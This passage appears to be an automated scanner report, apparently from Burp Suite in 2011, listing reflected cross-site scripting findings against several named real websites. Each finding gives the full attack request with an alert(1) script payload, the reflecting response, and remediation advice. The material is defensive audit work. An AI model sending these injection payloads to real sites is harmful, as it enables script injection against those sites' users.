_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.36. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 942cd"-alert(1)-"ffd8d4c4a27 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes942cd"-alert(1)-"ffd8d4c4a27/03BlueMeany/styles.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:31 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes942cd"-alert(1)-"ffd8d4c4a27/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.37. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17188"-alert(1)-"4251e1c163 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany17188"-alert(1)-"4251e1c163/styles.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:46 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes/03BlueMeany17188"-alert(1)-"4251e1c163/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.38. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eac0c"-alert(1)-"7fb6f8e43f1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany/styles.csseac0c"-alert(1)-"7fb6f8e43f1 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:55 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes/03BlueMeany/styles.csseac0c"-alert(1)-"7fb6f8e43f1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.39. http://blog.supermedia.com/comment_html.php [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /comment_html.php

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 791b3</script><script>alert(1)</script>95b6769fb51 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comment_html.php?cid=791b3</script><script>alert(1)</script>95b6769fb51 HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:38 GMT
Server: Unspecified
Content-Length: 101
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:38 GMT;path=/

<script type="text/javascript">alert("791b3</script><script>alert(1)</script>95b6769fb51");</script>

3.40. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2e1f"><script>alert(1)</script>3606575b7cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /index.php?z=1&source=opensearch&a=s&q={searchTerms}&b2e1f"><script>alert(1)</script>3606575b7cc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:52:49 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           
                                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com/rss/%7BsearchTerms%7D.html?source=opensearch&b2e1f"><script>alert(1)</script>3606575b7cc=1&p=20&format=RSS2.0" />
...[SNIP]...

3.41. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d10e'><script>alert(1)</script>2f96e732bb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /index.php?z=1&source=opensearch&a=s&q={searchTerms}&2d10e'><script>alert(1)</script>2f96e732bb6=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:53:00 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           
                                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta
...[SNIP]...
<input type=hidden name='2d10e'><script>alert(1)</script>2f96e732bb6' value="1">
...[SNIP]...

3.42. http://boardreader.com/my/signup.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /my/signup.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da9f2"><script>alert(1)</script>671f469cc02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/signup.html?da9f2"><script>alert(1)</script>671f469cc02=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:38 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<form name="mylogin_" action="/my/signup.html?da9f2"><script>alert(1)</script>671f469cc02=1" method="POST">
...[SNIP]...

3.43. http://boardreader.com/pop/articles/-/-/7.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/articles/-/-/7.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37ec4"><script>alert(1)</script>e3800dfbbbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/articles/-/-/7.html?37ec4"><script>alert(1)</script>e3800dfbbbc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:32:07 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/Toilet%2Bpaper%2Borientation.html?37ec4"><script>alert(1)</script>e3800dfbbbc=1" title="Search discussions for item &quot;Toilet paper orientation&quot;">
...[SNIP]...

3.44. http://boardreader.com/pop/films/-/-/3.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/films/-/-/3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef06b"><script>alert(1)</script>06db0769bba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/films/-/-/3.html?ef06b"><script>alert(1)</script>06db0769bba=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:56 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/D.html?ef06b"><script>alert(1)</script>06db0769bba=1" title="Search discussions for item &quot;D&quot;">
...[SNIP]...

3.45. http://boardreader.com/pop/instructions/-/-/7.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/instructions/-/-/7.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5f8"><script>alert(1)</script>69f17f800bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/instructions/-/-/7.html?9a5f8"><script>alert(1)</script>69f17f800bf=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:57 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/How%2Bto%2BBuild%2Ban%2BEarthbag%2BDome.html?9a5f8"><script>alert(1)</script>69f17f800bf=1" title="Search discussions for item &quot;How to Build an Earthbag Dome&quot;">
...[SNIP]...

3.46. http://boardreader.com/pop/news/-/-/3.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/news/-/-/3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 633c8"><script>alert(1)</script>21ff8f9967b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/news/-/-/3.html?633c8"><script>alert(1)</script>21ff8f9967b=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:32:01 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/Chinese%2Bair%2Bforce%2Bdrill%2Blooks%2Bawfully%2Bsimilar%2Bto%2B%25E2%2580%2598Top%2BGun%25E2%2580%2599.html?633c8"><script>alert(1)</script>21ff8f9967b=1" title="Search discussions for item &quot;Chinese air force drill looks awfully similar to ...Top Gun...&quot;">
...[SNIP]...

3.47. http://boardreader.com/pop/releases/-/-/3.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/releases/-/-/3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccc3d"><script>alert(1)</script>263690e9a78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/releases/-/-/3.html?ccc3d"><script>alert(1)</script>263690e9a78=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:58 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/Hyundai%2BMotor%2BAmerica%2BReports%2BRecord%2BJanuary%2BSales%2B--%2BFOUNTAIN%2BVALLEY%252C%2BCalif.%252C%2BFeb.%2B1%252C%2B2011%2B%252FPRNewswire%252F%2B--.html?ccc3d"><script>alert(1)</script>263690e9a78=1" title="Search discussions for item &quot;Hyundai Motor America Reports Record January Sales -- FOUNTAIN VALLEY, Calif., Feb. 1, 2011 /PRNewswire/ --&quot;">
...[SNIP]...

3.48. http://boardreader.com/pop/sites.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/sites.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c1aa'><script>alert(1)</script>341d035808d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/sites.html?9c1aa'><script>alert(1)</script>341d035808d=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:56 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href='/pop/sites.html?9c1aa'><script>alert(1)</script>341d035808d=1&o=10'>
...[SNIP]...

3.49. http://boardreader.com/pop/videos/-/-/3.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/videos/-/-/3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2008f"><script>alert(1)</script>ade1aee3939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/videos/-/-/3.html?2008f"><script>alert(1)</script>ade1aee3939=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:32:03 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/Today%2BShow%2BJanuary%2B1994...What%2Bis%2Bthe%2BInternet%253F%253F.html?2008f"><script>alert(1)</script>ade1aee3939=1" title="Search discussions for item &quot;Today Show January 1994...What is the Internet??&quot;">
...[SNIP]...

3.50. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload f1c31<script>alert(1)</script>9c812db7f39 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAADnAS0wE~,ddeyF9dBubzZEABHXI8Tafb593RYf5ad HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=486&height=322&flashID=myExperience700903960001&bgcolor=%23FFFFFF&playerID=64829845001&playerKey=AQ~~%2CAAAADnAS0wE~%2CddeyF9dBubzZEABHXI8Tafb593RYf5ad&isVid=true&dynamicStreaming=true&%40videoPlayer=700903960001&autoStart=
content-type: application/x-amf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 538

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q7a72a24e428a8cdcd38fc9490194c3afa5313cc1
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Content-Type: application/x-amf
Vary: Accept-Encoding
